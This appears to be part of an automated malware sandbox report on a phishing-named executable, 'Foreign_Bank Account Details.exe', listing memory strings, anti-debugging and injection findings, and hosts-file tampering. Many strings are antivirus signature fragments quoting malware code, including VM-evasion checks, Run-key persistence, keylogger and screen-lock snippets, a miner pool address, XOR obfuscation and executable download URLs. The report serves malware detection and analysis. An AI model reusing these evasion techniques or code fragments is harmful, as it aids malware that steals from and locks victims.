Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: HARDWARE\ACPI\RSDT\VBOX__
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000023.00000003.18286860697.0000015B081A5000.00000004.00000001.sdmp Binary or memory string: %s%s\%s.exe%s%sVMwareVMware
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: (AntiVirtualPCAntiVirtualBoxAntiVmWare]
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp Binary or memory string: Ven_VMware_
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp Binary or memory string: VmWareMachine
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp Binary or memory string: +system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: JE%Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: %SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17636064879.0000000002D19000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: MpSigStub.exe, 00000023.00000003.18350289745.0000015B1B712000.00000004.00000001.sdmp Binary or memory string: 2-*.log.|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: D?%ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: vmtoolsd
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp Binary or memory string: *.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp Binary or memory string: HSTR:Detects_VirtualPC_VMWare
Source: MpSigStub.exe, 00000023.00000003.18260309272.0000015B0C57A000.00000004.00000001.sdmp Binary or memory string: pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.VMRS.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: pUnix file descriptiontargetjob\\vmware-host:Y DomainBigSpace resultiitem]
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp Binary or memory string: virtual hd
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17636064879.0000000002D19000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp Binary or memory string: =mQ:#LowFiDetectsVmWareU
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp Binary or memory string: vmware svga ii
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: qemu-ga.exe
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17634657037.00000000022D0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp Binary or memory string: *VMWARE*": IsVirtualPCPresent
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.vmgs.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp Binary or memory string: IsVmWare]
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
Source: RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: MpSigStub.exe, 00000023.00000003.18242976274.0000015B0B50C000.00000004.00000001.sdmp Binary or memory string: 0123456789ABCDEF0123456789abcdef\Device\\SystemRootcoroutinenewproxyLua 5.1_VERSIONpairsipairs__modekv_Gcreateresumerunningstatuswrapyieldpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_uses_single_steppingpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesizepea_dmg_unsupportedpea_dmg_importspea_dmg_invaliddatapea_dmg_decompresspea_
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17636064879.0000000002D19000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: %Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp Binary or memory string: http://pubs.vmware.com
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: "vmware"$bisvm=trueelseif$smodel="virtualbox"
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: SCSIDISKxxvmboxxxharddiskVMware
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp Binary or memory string: +ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp Binary or memory string: VirtualMachineDetector
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp Binary or memory string: ,ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: % *.txt.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp Binary or memory string: ".VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp Binary or memory string: ifstringregexp($oobjectitem.name,"(?i)virtualbox|vmware|virtualpc|sandbox|333333|home-off-d5f0ac|microsof-2c393f|123|vwinxp-maltest")thenreturn1
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: 3svmcibex9
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: VMware Physical Disk Helper Service
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: &!*.toc.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp Binary or memory string: __tbt_isVirtualMachine
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp Binary or memory string: VBoxService.exe
Source: MpSigStub.exe, 00000023.00000003.18336377296.0000015B1BE9E000.00000004.00000001.sdmp Binary or memory string: VMWARETRAY.EXEx
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18298458791.0000015B1AD5A000.00000004.00000001.sdmp Binary or memory string: w!#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: =8*.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp Binary or memory string: KF*.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-armel.exe
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavdlta.vdm Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose, 42_2_00007FF650D4ADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4B030 FindNextFileW,FindClose,FindFirstFileW, 42_2_00007FF650D4B030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D72504 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_00007FF650D72504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle, 42_2_00007FF650CFF810

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D64A10 GetProcessHeap, 42_2_00007FF650D64A10
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004012D8 mov ebx, dword ptr fs:[00000030h] 1_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00402061 mov ebx, dword ptr fs:[00000030h] 1_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_0040191F mov ebx, dword ptr fs:[00000030h] 1_2_0040191F
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D53BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00007FF650D53BFC
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_012A7166 KiUserExceptionDispatcher,LdrInitializeThunk, 8_2_012A7166
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D6B530 SetUnhandledExceptionFilter, 42_2_00007FF650D6B530
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D6B798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_00007FF650D6B798
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D53BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00007FF650D53BFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D6BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00007FF650D6BD68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D6BF4C SetUnhandledExceptionFilter, 42_2_00007FF650D6BF4C

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1390000 Jump to behavior
Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\DFC5CBF6-B4C4-B49D-335D-ADBEBB78227A.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Contains functionality to query the security center for anti-virus and firewall products
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: pwinmgmts:\\localhost\root\securitycenter
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: <select * from antivirusproduct
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/predator.ra2!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: = stringreplace ( "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: " , "n" , "mi" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: chrw ( bitxor ( asc (
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: = stringreverse ( "utmbjghxrnjxmtb" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojandropper:win64/miner.rw!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: xdi_destroykey
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: xdi_shutdown
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: xdi_decryptdata
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: miner.kek.gay:443 --cpu-no-yield --asm=auto --cpu-memory-pool=-1
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:trojan:win32/covitse.pi!msr
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: fileinstall ( "c:\users\fud\desktop\11111111\corona.exe" , @appdatadir & "\z11062600\corona.exe" , 1 )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: shellexecute ( @appdatadir & "\z11062600\corona.exe" , "" , @appdatadir & "\z11062600" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:allowlist:injector.autoit.mx
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: #autoit3wrapper_res_field=companyname|genesis venture investment co., ltd.
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: wisest<wisest@vip.qq.com>
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:virtool:win32/autinject.g!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $xor = bitxor ( $xor , $len + $ii )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: rtlupd64
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: execute ( "@appdatadir" ) & "\winlogons"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \windows\microsoft.net\framework\v2.0.50727\regasm.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: startup ( "winlogons.exe" , "winlogons" , "+r" , "" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#trojan:win32/autoinjec.sa!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: l_imagesearcharea ( @appdatadir & "\microsoft\1\che.bmp
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lrun ( @tempdir & "scratch.bat" , @tempdir , @sw_hide )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/autoitinject.s1
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: enativ.com
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: regwrite ( "hkey_local_machine\software\microsoft\windows\currentversion\runonce
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \enativ\4xnav12p.txt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: = "http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/predator.ar_0109!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: global $sdeouljcvthbiisnlmbthiecg = execute
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: stringreplace ( "skxpyvmtnwvrovjagkuhnqvobgbtrkxpyvmtnwvrovjagkuhnqvobgbinkxpyv
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: vobgbnkxpyvmtnwvrovjagkuhnqvobgb" , "kxpyvmtnwvrovjagkuhnqvobgb" , "" ) )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: " & ".exe"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: = stringsplit ( tcuuq (
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alfper:clearlock!autoit
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $overlay = guicreate ( "clearlock" , @desktopwidth , @desktopheight ,
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: _blockinputex ( 3 , "[:alpha:]|[:number:]|{enter}|{backspace}
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:hstr:trojanspy:win32/keylogger.bad!bit
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \\software\microsoft\windows\currentversion\run
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: nlogfiles-" & $date & "-" & $pwd & ".htm
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: >func _logkeypress ( $what2log )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/autoitinject.aa!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dreturn execute ( "stringtobinary($
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lexecute ( " bitxor($xxxxx, $i, $xx)" )
